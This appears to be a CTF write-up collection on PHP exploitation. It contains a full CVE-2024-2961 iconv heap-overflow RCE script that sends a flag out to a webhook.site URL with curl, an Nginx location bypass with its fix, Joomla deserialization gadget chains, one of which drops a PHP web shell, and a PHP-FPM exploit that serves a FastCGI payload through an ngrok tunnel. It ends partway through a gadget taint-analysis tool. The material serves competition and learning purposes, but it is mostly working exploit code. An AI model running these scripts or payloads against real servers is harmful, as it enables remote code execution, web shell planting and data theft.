Skip to content

Categories

PHP

Proxy / WAF Protections Bypass | hacktricksNginx FPM configuration:CopyNginx is configured to block access to /admin.php but it's possible to bypass this by accessing /admin.php/index.php.Copytl;dr ab...

Created

Updated

87 min read

Reading time

1 categories

Topics covered

Share:

Tip: for Facebook and LinkedIn, use Copy first, then paste when the platform opens.

PHP

CVE-2024-2961 iconv

Event Name0xl4ugh
GitHub URL-
Challenge Name0xNote
Attachments
References

solve

Now that we can read arbitrary files, we can move to the next level: RCE. The key vulnerability here is CVE-2024-2961.

Vuln lab:

https://github.com/vulhub/vulhub/blob/master/php/CVE-2024-2961/README.md

POC:

https://github.com/ambionics/cnext-exploits/blob/main/cnext-exploit.py

Because I’m just a chicken when it comes to pwn, I’ll only tell what we need to read:

  • /proc/self/maps
  • Use SPLFileObject('php://<iconv to set the charset>') to trigger RCE
  • For full details, you can read here : https://blog.lexfo.fr/iconv-cve-2024-2961-p1.html

    Full solve script

    This is my solve script to bypass nginx -> read file -> set the charset to trigger RCE (Remember to change the webhook URL to your own)

    import requests
    from pwn import *
    import re
    import base64
    import zlib
    from bs4 import BeautifulSoup
    
    session = requests.Session()
    
    ## Constant
    
    HEAP_SIZE = 2 * 1024 * 1024
    BUG = "劄".encode("utf-8")
    
    ## Post init function
    
    def get_file(url, path):
        path = f"php://filter/convert.base64-encode/resource={path}"
        r = session.post(url + 'login.php', data={'username':'winky'})
        r = session.post(url + 'index.php', data={'note':path})
        r = session.post(url + '/premium.php/index.php', data={'color': 'SplFileObject'})
        r = session.get(url + 'index.php')
        soup = BeautifulSoup(r.text, "html.parser")
        data = soup.find("div", id="noteContent").get_text(strip=True)
        return base64.b64decode(data)
    
    def compress(data):
        return zlib.compress(data, 9)[2:-4]
    
    def compressed_bucket(data):
        return chunked_chunk(data, 0x8000)
    
    def qpe(data):
        return "".join(f"={x:02x}" for x in data).upper().encode()
    
    def ptr_bucket(*ptrs, size=None):
        if size is not None:
            assert len(ptrs) * 8 == size
        bucket = b"".join(map(p64, ptrs))
        bucket = qpe(bucket)
        bucket = chunked_chunk(bucket)
        bucket = chunked_chunk(bucket)
        bucket = chunked_chunk(bucket)
        bucket = compressed_bucket(bucket)
        return bucket
    
    def chunked_chunk(data, size: int = None):
        if size is None:
            size = len(data) + 8
        keep = len(data) + len(b"\n\n")
        size = f"{len(data):x}".rjust(size - keep, "0")
        return size.encode() + b"\n" + data + b"\n"
    
    ## Pwn core
    
    class PWN_Core():
        def __init__(self, url, command) -> None:
            self.url = url
            self.command = command
            self.info = {}
            self.heap = None
            self.pad = 20
    
        class Region():
            def __init__(self, start, stop, permissions, path):
                self.start = int(start)
                self.stop = int(stop)
                self.permissions = permissions
                self.path = path
    
            @property
            def size(self) -> int:
                return self.stop - self.start
    
        def download_file(self, remote_path: str, local_path: str) -> None:
            data = get_file(self.url, remote_path)
            Path(local_path).write_bytes(data)
    
        def get_regions(self):
            maps = get_file(self.url, "/proc/self/maps")
            maps = maps.decode()
            PATTERN = re.compile(
                r"^([a-f0-9]+)-([a-f0-9]+)\b" r".*" r"\s([-rwx]{3}[ps])\s" r"(.*)"
            )
            regions = []
            for region in [line.strip() for line in maps.strip().split('\n')]:
                if match := PATTERN.match(region):
                    start = int(match.group(1), 16)
                    stop = int(match.group(2), 16)
                    permissions = match.group(3)
                    path = match.group(4)
                    if "/" in path or "[" in path:
                        path = path.rsplit(" ", 1)[-1]
                    else:
                        path = ""
                    current = self.Region(start, stop, permissions, path)
                    regions.append(current)
    
                else:
                    print(maps)
            return regions
    
        def _get_region(self, regions: list[Region], *names: str) -> Region:
            for region in regions:
                if any(name in region.path for name in names):
                    break
            return region
    
        def find_main_heap(self, regions):
            heaps = [
                region.stop - HEAP_SIZE + 0x40
                for region in reversed(regions)
                if region.permissions == "rw-p"
                and region.size >= HEAP_SIZE
                and region.stop & (HEAP_SIZE-1) == 0
                and region.path in ("", "[anon:zend_alloc]")
            ]
            first = heaps[0]
            if len(heaps) > 1:
                heaps = ", ".join(map(hex, heaps))
            return first
    
        def get_symbols_and_addresses(self) -> None:
            regions = self.get_regions()
            LIBC_FILE = "./libc"
            self.info["heap"] = self.find_main_heap(regions)
            libc = self._get_region(regions, "libc-", "libc.so")
            self.download_file(libc.path, LIBC_FILE)
            self.info["libc"] = ELF(LIBC_FILE, checksec=False)
            self.info["libc"].address = libc.start
    
        def build_exploit_path(self):
    
            self.get_symbols_and_addresses()
    
            LIBC = self.info["libc"]
            ADDR_EMALLOC = LIBC.symbols["__libc_malloc"]
            ADDR_EFREE = LIBC.symbols["__libc_system"]
            ADDR_EREALLOC = LIBC.symbols["__libc_realloc"]
            ADDR_HEAP = self.info["heap"]
            ADDR_FREE_SLOT = ADDR_HEAP + 0x20
            ADDR_CUSTOM_HEAP = ADDR_HEAP + 0x0168
            ADDR_FAKE_BIN = ADDR_FREE_SLOT - 0x10
            CS = 0x100
    
            pad_size = CS - 0x18
            pad = b"\x00" * pad_size
            pad = chunked_chunk(pad, len(pad) + 6)
            pad = chunked_chunk(pad, len(pad) + 6)
            pad = chunked_chunk(pad, len(pad) + 6)
            pad = compressed_bucket(pad)
    
            step1_size = 1
            step1 = b"\x00" * step1_size
            step1 = chunked_chunk(step1)
            step1 = chunked_chunk(step1)
            step1 = chunked_chunk(step1, CS)
            step1 = compressed_bucket(step1)
    
            step2_size = 0x48
            step2 = b"\x00" * (step2_size + 8)
            step2 = chunked_chunk(step2, CS)
            step2 = chunked_chunk(step2)
            step2 = compressed_bucket(step2)
    
            step2_write_ptr = b"0\n".ljust(step2_size, b"\x00") + p64(ADDR_FAKE_BIN)
            step2_write_ptr = chunked_chunk(step2_write_ptr, CS)
            step2_write_ptr = chunked_chunk(step2_write_ptr)
            step2_write_ptr = compressed_bucket(step2_write_ptr)
    
            step3_size = CS
            step3 = b"\x00" * step3_size
            assert len(step3) == CS
            step3 = chunked_chunk(step3)
            step3 = chunked_chunk(step3)
            step3 = chunked_chunk(step3)
            step3 = compressed_bucket(step3)
    
            step3_overflow = b"\x00" * (step3_size - len(BUG)) + BUG
            assert len(step3_overflow) == CS
            step3_overflow = chunked_chunk(step3_overflow)
            step3_overflow = chunked_chunk(step3_overflow)
            step3_overflow = chunked_chunk(step3_overflow)
            step3_overflow = compressed_bucket(step3_overflow)
    
            step4_size = CS
            step4 = b"=00" + b"\x00" * (step4_size - 1)
            step4 = chunked_chunk(step4)
            step4 = chunked_chunk(step4)
            step4 = chunked_chunk(step4)
            step4 = compressed_bucket(step4)
    
            step4_pwn = ptr_bucket(
                0x200000,
                0,
                # free_slot
                0,
                0,
                ADDR_CUSTOM_HEAP,  # 0x18
                0,
                0,
                0,
                0,
                0,
                0,
                0,
                0,
                0,
                0,
                0,
                0,
                0,
                ADDR_HEAP,  # 0x140
                0,
                0,
                0,
                0,
                0,
                0,
                0,
                0,
                0,
                0,
                0,
                0,
                0,
                size=CS,
            )
    
            step4_custom_heap = ptr_bucket(
                ADDR_EMALLOC, ADDR_EFREE, ADDR_EREALLOC, size=0x18
            )
    
            step4_use_custom_heap_size = 0x140
    
            COMMAND = self.command
            COMMAND = f"kill -9 $PPID; {COMMAND}"
            COMMAND = COMMAND.encode() + b"\x00"
    
            COMMAND = COMMAND.ljust(step4_use_custom_heap_size, b"\x00")
    
            step4_use_custom_heap = COMMAND
            step4_use_custom_heap = qpe(step4_use_custom_heap)
            step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
            step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
            step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
            step4_use_custom_heap = compressed_bucket(step4_use_custom_heap)
    
            pages = (
                step4 * 3
                + step4_pwn
                + step4_custom_heap
                + step4_use_custom_heap
                + step3_overflow
                + pad * self.pad
                + step1 * 3
                + step2_write_ptr
                + step2 * 2
            )
    
            resource = compress(compress(pages))
            resource = base64.b64encode(resource).decode()
            resource = f"data:text/plain;base64,{resource}"
    
            filters = [
                # Create buckets
                "zlib.inflate",
                "zlib.inflate",
    
                # Step 0: Setup heap
                "dechunk",
                "convert.iconv.L1.L1",
    
                # Step 1: Reverse FL order
                "dechunk",
                "convert.iconv.L1.L1",
    
                # Step 2: Put fake pointer and make FL order back to normal
                "dechunk",
                "convert.iconv.L1.L1",
    
                # Step 3: Trigger overflow
                "dechunk",
                "convert.iconv.UTF-8.ISO-2022-CN-EXT",
    
                # Step 4: Allocate at arbitrary address and change zend_mm_heap
                "convert.quoted-printable-decode",
                "convert.iconv.L1.L1",
            ]
            filters = "|".join(filters)
            path = f"php://filter/read={filters}/resource={resource}"
            return path
    
    def solve():
        # URL = 'http://challenges2.ctf.sd:34896/'
        URL = 'http://127.0.0.1:5000/'
        path = PWN_Core(URL, 'curl https://webhook.site/ca9a194c-4098-4d72-85c1-1e96a6a62fa0/$(/readflag)').build_exploit_path()
        try:
            r = get_file(URL, path)
        except:
            pass
        print('Exploit sucessfully')
    solve()
    

    PHP-FPM

    Proxy / WAF Protections Bypass | hacktricks

    Nginx FPM configuration:

    Copy

    location = /admin.php {
        deny all;
    }
    
    location ~ \.php$ {
        include snippets/fastcgi-php.conf;
        fastcgi_pass unix:/run/php/php8.1-fpm.sock;
    }

    Nginx is configured to block access to /admin.php but it's possible to bypass this by accessing /admin.php/index.php.

    How to prevent

    Copy

    location ~* ^/admin {
        deny all;
    }

    Joomla PHP Gadget Chain

    Event NameQiangWang CTF 2025
    GitHub URL-
    Challenge Name-
    Attachments
    References

    solver 1
    <?php
    // https://xz.aliyun.com/t/17019?time__1311=mqGxnD9Dcim4lrzG7DyDIxhIDCUw3v33x
    namespace Joomla\Database\Pdo {
        class PdoDriver
        {
            protected $options;
    
            public function __construct($options)
            {
                $this->options = $options;
            }
        }
    
    }
    
    namespace Symfony\Component\OptionsResolver {
    
        class OptionsResolver
        {
            private bool $locked = true;
    
            private array $defined = ['id'];
    
            private array $lazy = array(
                "orderBy" => array("array_walk_recursive")
            );
    
            private array $defaults = array(
                "orderBy" => "system"
            );
    
        }
    
    }
    
    namespace Joomla\Database\Sqlite {
        class SqliteDriver
        {
            protected $options;
    
            public function __construct($options)
            {
                $this->options = $options;
            }
        }
    
        class SqliteQuery
        {
    
            protected $type = 'select';
    
            protected $selectRowNumber;
            public function __construct()
            {
                $this->selectRowNumber = new \Symfony\Component\OptionsResolver\OptionsResolver();
            }
    
        }
    
    }
    
    
    namespace Joomla\CMS\Button {
    
        class ActionButton
        {
    
            protected $states = [];
    
    
            public function __construct()
            {
            }
        }
    }
    
    namespace {
    
    
    
        $toStringObj = new \Joomla\CMS\Button\ActionButton();
    
        $toStringObj = new \Joomla\Database\Sqlite\SqliteQuery();
    
        $options = array(
            "driver" => $toStringObj
        );
        $pdoDriver = new \Joomla\Database\Pdo\PdoDriver($options);
        $pdoDriver = new \Joomla\Database\Sqlite\SqliteDriver($options);
    
    
        $ser = serialize($pdoDriver);
    
        echo base64_encode($ser);
    }
    solver 2

    Found an entirely different one, bypass of patched chain

    <?php
    namespace Joomla\Filesystem {
        class Stream
        {
            protected $a;
            protected $b;
            protected $fh = "fdsafa";
    
            public function __construct($a, $b)
            {
                $this->a = $a;
                $this->b = $b;
            }
        }
    }
    namespace Joomla\CMS\Log\Logger {
        class FormattedtextLogger
        {
            public $defer;
            protected $options = ['text_file_no_php' => true];
            protected $path;
            public $deferredEntries = [];
            protected $format = '{F}';
            protected $fields = ['F'];
            public function __construct($path, $deferredEntries)
            {
                $this->path = $path;
                $this->deferredEntries = $deferredEntries;
            }
        }
    }
    namespace Joomla\CMS\User {
        class User
        {
            public $guest;
    
            public function __construct($guest)
            {
                $this->guest = $guest;
            }
        }
    }
    namespace {
                $path = "hui.php";
                $data = "<?php system(\$_GET['cmd']); ?>";
    
                $hui = new \stdClass();
                $entry = new \Joomla\CMS\Log\LogEntry($data);
                $entries = [$entry, $entry];
                $defer = false;
                $res = [
                    $defer,
                ];
                $res[] =& $res[0];
                $user = new \Joomla\CMS\User\User(
                    $defer
                );
                $logger = new \Joomla\CMS\Log\Logger\FormattedtextLogger(
                    $path,
                    $entries, // Reference to the array in LogEntry
                );
                $user->guest =& $res[0];
                $logger->defer =& $res[0];
    
                $res[] = $logger;
                $res[] = $user;
                return $res;
            
    }

    Exposed PHP FPM Exploit

    solve
    import random
    import httpx
    from pyngrok import ngrok
    from flask import Flask
    from multiprocessing import Process
    
    
    # Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client
    # Referrer: https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75
    
    RHOST = "http://54.251.191.248:31530/"
    # RHOST = "http://localhost:31530/"
    TUNNEL = ngrok.connect(4444, "http")
    
    
    def bchr(i):
        return bytes([i])
    
    
    def bord(c):
        if isinstance(c, int):
            return c
        else:
            return ord(c)
    
    
    def force_bytes(s):
        if isinstance(s, bytes):
            return s
        else:
            return s.encode('utf-8', 'strict')
    
    
    def force_text(s):
        if issubclass(type(s), str):
            return s
        if isinstance(s, bytes):
            s = str(s, 'utf-8', 'strict')
        else:
            s = str(s)
        return s
    
    
    class FastCGIClient:
        """A Fast-CGI Client for Python"""
    
        # private
        __FCGI_VERSION = 1
    
        __FCGI_ROLE_RESPONDER = 1
        __FCGI_ROLE_AUTHORIZER = 2
        __FCGI_ROLE_FILTER = 3
    
        __FCGI_TYPE_BEGIN = 1
        __FCGI_TYPE_ABORT = 2
        __FCGI_TYPE_END = 3
        __FCGI_TYPE_PARAMS = 4
        __FCGI_TYPE_STDIN = 5
        __FCGI_TYPE_STDOUT = 6
        __FCGI_TYPE_STDERR = 7
        __FCGI_TYPE_DATA = 8
        __FCGI_TYPE_GETVALUES = 9
        __FCGI_TYPE_GETVALUES_RESULT = 10
        __FCGI_TYPE_UNKOWNTYPE = 11
    
        __FCGI_HEADER_SIZE = 8
    
        # request state
        FCGI_STATE_SEND = 1
        FCGI_STATE_ERROR = 2
        FCGI_STATE_SUCCESS = 3
    
        def __init__(self):
            self.keepalive = 0
            self.requests = dict()
    
        def __encodeFastCGIRecord(self, fcgi_type, content, requestid):
            length = len(content)
            buf = bchr(FastCGIClient.__FCGI_VERSION) \
                + bchr(fcgi_type) \
                + bchr((requestid >> 8) & 0xFF) \
                + bchr(requestid & 0xFF) \
                + bchr((length >> 8) & 0xFF) \
                + bchr(length & 0xFF) \
                + bchr(0) \
                + bchr(0) \
                + content
            return buf
    
        def __encodeNameValueParams(self, name, value):
            nLen = len(name)
            vLen = len(value)
            record = b''
            if nLen < 128:
                record += bchr(nLen)
            else:
                record += bchr((nLen >> 24) | 0x80) \
                    + bchr((nLen >> 16) & 0xFF) \
                    + bchr((nLen >> 8) & 0xFF) \
                    + bchr(nLen & 0xFF)
            if vLen < 128:
                record += bchr(vLen)
            else:
                record += bchr((vLen >> 24) | 0x80) \
                    + bchr((vLen >> 16) & 0xFF) \
                    + bchr((vLen >> 8) & 0xFF) \
                    + bchr(vLen & 0xFF)
            return record + name + value
    
        def __decodeFastCGIHeader(self, stream):
            header = dict()
            header['version'] = bord(stream[0])
            header['type'] = bord(stream[1])
            header['requestId'] = (bord(stream[2]) << 8) + bord(stream[3])
            header['contentLength'] = (bord(stream[4]) << 8) + bord(stream[5])
            header['paddingLength'] = bord(stream[6])
            header['reserved'] = bord(stream[7])
            return header
    
        def __decodeFastCGIRecord(self, buffer):
            header = buffer.read(int(self.__FCGI_HEADER_SIZE))
    
            if not header:
                return False
            else:
                record = self.__decodeFastCGIHeader(header)
                record['content'] = b''
    
                if 'contentLength' in record.keys():
                    contentLength = int(record['contentLength'])
                    record['content'] += buffer.read(contentLength)
                if 'paddingLength' in record.keys():
                    skiped = buffer.read(int(record['paddingLength']))
                return record
    
        def request(self, nameValuePairs={}, post=''):
            requestId = random.randint(1, (1 << 16) - 1)
            self.requests[requestId] = dict()
            request = b""
            beginFCGIRecordContent = bchr(0) \
                + bchr(FastCGIClient.__FCGI_ROLE_RESPONDER) \
                + bchr(self.keepalive) \
                + bchr(0) * 5
            request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_BEGIN,
                                                  beginFCGIRecordContent, requestId)
            paramsRecord = b''
            if nameValuePairs:
                for (name, value) in nameValuePairs.items():
                    name = force_bytes(name)
                    value = force_bytes(value)
                    paramsRecord += self.__encodeNameValueParams(name, value)
    
            if paramsRecord:
                request += self.__encodeFastCGIRecord(
                    FastCGIClient.__FCGI_TYPE_PARAMS, paramsRecord, requestId)
            request += self.__encodeFastCGIRecord(
                FastCGIClient.__FCGI_TYPE_PARAMS, b'', requestId)
    
            if post:
                request += self.__encodeFastCGIRecord(
                    FastCGIClient.__FCGI_TYPE_STDIN, force_bytes(post), requestId)
            request += self.__encodeFastCGIRecord(
                FastCGIClient.__FCGI_TYPE_STDIN, b'', requestId)
    
            return request
    
        def __repr__(self):
            return "fastcgi connect host:{} port:{}".format(self.host, self.port)
    
    
    def build_request(cmd):
        client = FastCGIClient()
        params = dict()
        documentRoot = "/"
        uri = "/usr/local/lib/php/System.php"
        content = f"<?=`{cmd}`?>"
        params = {
            'GATEWAY_INTERFACE': 'FastCGI/1.0',
            'REQUEST_METHOD': 'POST',
            'SCRIPT_FILENAME': documentRoot + uri.lstrip('/'),
            'SCRIPT_NAME': uri,
            'QUERY_STRING': '',
            'REQUEST_URI': uri,
            'DOCUMENT_ROOT': documentRoot,
            'SERVER_SOFTWARE': 'php/fcgiclient',
            'REMOTE_ADDR': '127.0.0.1',
            'REMOTE_PORT': '9985',
            'SERVER_ADDR': '127.0.0.1',
            'SERVER_PORT': '80',
            'SERVER_NAME': "localhost",
            'SERVER_PROTOCOL': 'HTTP/1.1',
            'CONTENT_TYPE': 'application/text',
            'CONTENT_LENGTH': "%d" % len(content),
            'PHP_VALUE': 'auto_prepend_file = php://input',
            'PHP_ADMIN_VALUE': 'allow_url_include = On'
        }
        return client.request(params, content)
    
    def web(cmd):
        app = Flask(__name__)
        @app.get("/")
        def data():
            return build_request(cmd)
        app.run("0.0.0.0", 4444)
    
    
    
    class API:
        def __init__(self) -> None:
            self.c = httpx.Client(base_url=RHOST)
    
        def curl(s, args):
            return s.c.post("/", data={"urlInput": args})
    
    
    if __name__ == '__main__':
        cmd = "cat /flag*"
        proc = Process(target=web, args=(cmd,))
        proc.start()
        url = TUNNEL.public_url
        print(url)
        api = API()
        res = api.curl(f"{url} -o /tmp/data")
        res = api.curl("telnet://localhost:9000 -T /tmp/data")
        print(res.text)
        proc.kill()

    Gadget Taint Analysis in PHP and Symfony bundle part POP Chain

    Event NameInfobahn CTF 2025
    GitHub URL-
    Challenge NamePadoru Pwn Parade
    Attachments

    normal:

    revenge:

    References

    Unitended

    using AST

    #!/usr/bin/env python3
    """
    Advanced PHP Gadget Chain Taint Analysis Tool
    Uses php-ast Python module for accurate AST parsing
    Supports multi-level taint tracking and object injection detection
    
    Installation:
        pip install php-ast
    
    Usage:
        python gadget_analyzer.py -d /path/to/php/project -r
    """
    
    import os
    import sys
    import json
    import argparse
    import subprocess
    import shutil
    import tempfile
    from pathlib import Path
    from dataclasses import dataclass, field
    from typing import Dict, List, Set, Optional, Any
    from collections import defaultdict, deque
    from enum import Enum
    
    # Increase recursion limit as safety measure (though we use iterative traversal)
    sys.setrecursionlimit(5000)
    
    try:
        from php_ast import php_ast
        PHP_AST_AVAILABLE = True
    except ImportError:
        PHP_AST_AVAILABLE = False
        print("Warning: php-ast module not found. Install with: pip install php-ast")
    
    
    class TaintLevel(Enum):
        """Taint severity levels"""
        SAFE = 0
        LOW = 1
        MEDIUM = 2
        HIGH = 3
        CRITICAL = 4
    
    
    @dataclass
    class TaintSource:
        """Represents a taint source"""
        name: str
        class_name: str
        method_name: str
        variable: str
        location: str
        source_type: str
        confidence: float = 1.0
    
    
    @dataclass
    class TaintSink:
        """Represents a dangerous sink"""
        name: str
        class_name: str
        method_name: str
        filepath: str
        location: str
        function: str
        severity: TaintLevel
        line: int
        parameters: List[str] = field(default_factory=list)
    
    
    @dataclass
    class CallSite:
        """Represents a function/method call"""
        caller_class: str
        caller_method: str
        callee_class: Optional[str]
        callee_method: str
        call_type: str
        line: int
        variable: Optional[str] = None
    
    
    @dataclass
    class PropertyAccess:
        """Property access tracking"""
        class_name: str
        method_name: str
        property_name: str
        access_type: str
        line: int
    
    
    @dataclass
    class GadgetChain:
        """Detected gadget chain"""
        chain_id: int
        entry_points: List[str]
        chain_path: List[Dict[str, Any]]
        sink: TaintSink
        severity: TaintLevel
        confidence: float
        description: str
        injectable_objects: List[Dict[str, Any]]
        exploitation_notes: str
    
    
    class PHPASTParser:
        """Parser that leverages php-ast module with a PHP CLI fallback"""
        
        def __init__(self):
            self.cli_parser = self._init_cli_parser()
            self.parser = php_ast() if PHP_AST_AVAILABLE else None
            
            if not self.parser and not self.cli_parser:
                raise RuntimeError(
                    "php-ast module or PHP CLI ast extension is required. "
                    "Install python package with: pip install php-ast or enable the PHP ast extension."
                )
        
        def parse_file(self, filepath: str) -> Dict:
            """Parse PHP file and return AST"""
            result = self._parse_with_module(filepath)
            if result['success'] or not self.cli_parser:
                return result
            
            return self._parse_with_cli(filepath)
        
        def parse_code(self, code: bytes) -> Dict:
            """Parse PHP code bytes and return AST"""
            result = self._parse_code_with_module(code)
            if result['success'] or not self.cli_parser:
                return result
            
            tmp_file = None
            try:
                with tempfile.NamedTemporaryFile('wb', suffix='.php', delete=False) as handle:
                    handle.write(code)
                    tmp_file = handle.name
                cli_result = self._parse_with_cli(tmp_file)
                return cli_result
            finally:
                if tmp_file and os.path.exists(tmp_file):
                    os.unlink(tmp_file)
    
        def _parse_with_module(self, filepath: str) -> Dict[str, Any]:
            if not self.parser:
                return {
                    'filepath': filepath,
                    'ast': None,
                    'success': False,
                    'error': 'php-ast module unavailable'
                }
            
            try:
                result = self.parser.get_file_ast(filepath)
                if result.get('status') == 'successed':
                    return {
                        'filepath': filepath,
                        'ast': result.get('ast'),
                        'success': True
                    }
                return {
                    'filepath': filepath,
                    'ast': None,
                    'success': False,
                    'error': result.get('error') or result.get('reason') or 'Unknown error'
                }
            except Exception as exc:
                return {
                    'filepath': filepath,
                    'ast': None,
                    'success': False,
                    'error': str(exc)
                }
    
        def _parse_code_with_module(self, code: bytes) -> Dict[str, Any]:
            if not self.parser:
                return {
                    'ast': None,
                    'success': False,
                    'error': 'php-ast module unavailable'
                }
            
            try:
                result = self.parser.get_ast(code)
                if result.get('status') == 'successed':
                    return {
                        'ast': result.get('ast'),
                        'success': True
                    }
                return {
                    'ast': None,
                    'success': False,
                    'error': result.get('error') or result.get('reason') or 'Unknown error'
                }
            except Exception as exc:
                return {
                    'ast': None,
                    'success': False,
                    'error': str(exc)
                }
    
        def _parse_with_cli(self, filepath: str) -> Dict[str, Any]:
            if not self.cli_parser:
                return {
                    'filepath': filepath,
                    'ast': None,
                    'success': False,
                    'error': 'PHP CLI parser unavailable'
                }
            
            cmd = [
                self.cli_parser['binary'],
                self.cli_parser['script'],
                filepath,
                str(self.cli_parser['version'])
            ]
            
            try:
                result = subprocess.run(
                    cmd,
                    capture_output=True,
                    text=True,
                    check=False
                )
            except Exception as exc:
                return {
                    'filepath': filepath,
                    'ast': None,
                    'success': False,
                    'error': f"PHP CLI invocation failed: {exc}"
                }
            
            stdout = result.stdout.strip()
            try:
                parsed = json.loads(stdout) if stdout else {}
            except json.JSONDecodeError:
                return {
                    'filepath': filepath,
                    'ast': None,
                    'success': False,
                    'error': f"Invalid JSON from PHP CLI: {stdout[:120]}"
                }
            
            status = parsed.get('status')
            success = status == 'successed'
            error_msg = parsed.get('reason') or parsed.get('error') or (result.stderr.strip() if result.stderr else None)
            
            return {
                'filepath': filepath,
                'ast': parsed.get('ast'),
                'success': success,
                'error': error_msg
            }
    
        def _init_cli_parser(self) -> Optional[Dict[str, Any]]:
            php_binary = shutil.which('php')
            script_path = Path(__file__).resolve().parent / 'scripts' / 'php_ast_cli.php'
            
            if not php_binary or not script_path.exists():
                return None
            
            if not self._php_has_ast_extension(php_binary):
                return None
            
            supported_versions = self._get_supported_ast_versions(php_binary)
            preferred_version = supported_versions[-1] if supported_versions else 90
            
            return {
                'binary': php_binary,
                'script': str(script_path),
                'version': preferred_version
            }
    
        def _php_has_ast_extension(self, php_binary: str) -> bool:
            try:
                result = subprocess.run(
                    [php_binary, '-r', 'echo extension_loaded("ast") ? "1" : "0";'],
                    capture_output=True,
                    text=True,
                    check=True
                )
                return result.stdout.strip() == '1'
            except Exception:
                return False
    
        def _get_supported_ast_versions(self, php_binary: str) -> List[int]:
            try:
                result = subprocess.run(
                    [php_binary, '-r', 'echo json_encode(ast\\get_supported_versions());'],
                    capture_output=True,
                    text=True,
                    check=True
                )
                data = json.loads(result.stdout.strip() or '[]')
                versions = []
                for value in data or []:
                    try:
                        versions.append(int(value))
                    except (TypeError, ValueError):
                        continue
                return sorted(set(versions))
            except Exception:
                return []
    
    
    class ASTWalker:
        """Walks and analyzes PHP AST"""
        
        def __init__(self):
            self.classes: Dict[str, Dict] = {}
            self.methods: Dict[str, Dict] = {}
            self.calls: List[CallSite] = []
            self.property_accesses: List[PropertyAccess] = []
            self.current_class: Optional[str] = None
            self.current_method: Optional[str] = None
            self.current_file: str = ""
            
        def walk(self, ast_data: Dict):
            """Walk through AST and extract information"""
            if not ast_data.get('success'):
                return
            
            self.current_file = ast_data.get('filepath', '')
            ast = ast_data.get('ast')
            
            if ast:
                self._traverse_iterative(ast)
        
        def _traverse_iterative(self, root: Dict):
            """Iteratively traverse AST nodes using a stack to avoid recursion depth issues"""
            if not isinstance(root, dict):
                return
            
            # Stack contains tuples of (node, parent_context)
            stack = [(root, None)]
            
            while stack:
                node, parent_context = stack.pop()
                
                if not isinstance(node, dict):
                    continue
                
                kind = node.get('kind')
                line = node.get('lineno', 0)
                
                # Process node based on kind
                try:
                    if kind == 'AST_CLASS':
                        self._process_class(node)
                    elif kind == 'AST_METHOD':
                        self._process_method(node, parent_context)
                    elif kind == 'AST_CALL':
                        self._process_call(node, line)
                    elif kind == 'AST_METHOD_CALL':
                        self._process_method_call(node, line)
                    elif kind == 'AST_STATIC_CALL':
                        self._process_static_call(node, line)
                    elif kind == 'AST_NEW':
                        self._process_new(node, line)
                    elif kind == 'AST_PROP':
                        self._process_property_access(node, line)
                except Exception as e:
                    # Continue processing even if one node fails
                    pass
                
                # Add children to stack
                new_context = {'parent_kind': kind, 'parent_line': line}
                children = node.get('children')
                
                if isinstance(children, dict):
                    for key, child in children.items():
                        if isinstance(child, dict):
                            stack.append((child, new_context))
                        elif isinstance(child, list):
                            for item in child:
                                if isinstance(item, dict):
                                    stack.append((item, new_context))
                elif isinstance(children, list):
                    for child in children:
                        if isinstance(child, dict):
                            stack.append((child, new_context))
        
        def _process_class(self, node: Dict):
            """Process class declaration"""
            children = node.get('children', {})
            name_node = children.get('name')
            extends_node = children.get('extends')
            implements_node = children.get('implements')
            
            class_name = self._get_name(name_node)
            parent_name = self._get_name(extends_node) if extends_node else None
            implements = self._extract_name_list(implements_node) if implements_node else []
            
            if class_name:
                old_class = self.current_class
                self.current_class = class_name
                
                self.classes[class_name] = {
                    'name': class_name,
                    'parent': parent_name,
                    'interfaces': implements,
                    'methods': {},
                    'properties': [],
                    'filepath': self.current_file,
                    'line': node.get('lineno', 0)
                }
                
                # Process class body using iterative approach
                stmts = children.get('stmts')
                if stmts:
                    self._process_stmts_iterative(stmts)
                
                self.current_class = old_class
        
        def _process_stmts_iterative(self, stmts_node: Dict):
            """Process statements iteratively"""
            if not isinstance(stmts_node, dict):
                return
            
            stack = [stmts_node]
            
            while stack:
                node = stack.pop()
                
                if not isinstance(node, dict):
                    continue
                
                kind = node.get('kind')
                line = node.get('lineno', 0)
                
                # Process specific node types
                try:
                    if kind == 'AST_METHOD':
                        self._process_method(node, None)
                    elif kind == 'AST_PROP_DECL':
                        self._process_property_decl(node)
                except Exception:
                    pass
                
                # Add children to stack
                children = node.get('children')
                if isinstance(children, dict):
                    for child in children.values():
                        if isinstance(child, (dict, list)):
                            stack.append(child)
                elif isinstance(children, list):
                    for child in children:
                        if isinstance(child, dict):
                            stack.append(child)
        
        def _process_property_decl(self, node: Dict):
            """Process property declaration"""
            if not self.current_class:
                return
            
            children = node.get('children', {})
            
            # Handle property declarations
            if isinstance(children, list):
                for prop in children:
                    if isinstance(prop, dict):
                        prop_children = prop.get('children', {})
                        name_node = prop_children.get('name')
                        prop_name = self._get_name(name_node)
                        if prop_name:
                            self.classes[self.current_class]['properties'].append(prop_name)
        
        def _process_method(self, node: Dict, parent_context: Dict = None):
            """Process method declaration"""
            children = node.get('children', {})
            name_node = children.get('name')
            
            method_name = self._get_name(name_node)
            
            if method_name and self.current_class:
                old_method = self.current_method
                self.current_method = method_name
                method_key = f"{self.current_class}::{method_name}"
                
                method_data = {
                    'class': self.current_class,
                    'name': method_name,
                    'is_magic': method_name.startswith('__') and not method_name.endswith('construct'),
                    'line': node.get('lineno', 0),
                    'filepath': self.current_file,
                    'params': self._extract_params(children.get('params')),
                    'calls': [],
                    'property_accesses': [],
                    'variables': set()
                }
                
                self.methods[method_key] = method_data
                
                if self.current_class in self.classes:
                    self.classes[self.current_class]['methods'][method_name] = method_data
                
                # Process method body iteratively
                stmts = children.get('stmts')
                if stmts:
                    self._process_method_body_iterative(stmts, method_key)
                
                self.current_method = old_method
        
        def _process_method_body_iterative(self, stmts_node: Dict, method_key: str):
            """Process method body iteratively to avoid deep recursion"""
            if not isinstance(stmts_node, dict):
                return
            
            stack = [stmts_node]
            processed = set()
            
            while stack:
                node = stack.pop()
                
                if not isinstance(node, dict):
                    continue
                
                # Avoid processing the same node multiple times
                node_id = id(node)
                if node_id in processed:
                    continue
                processed.add(node_id)
                
                kind = node.get('kind')
                line = node.get('lineno', 0)
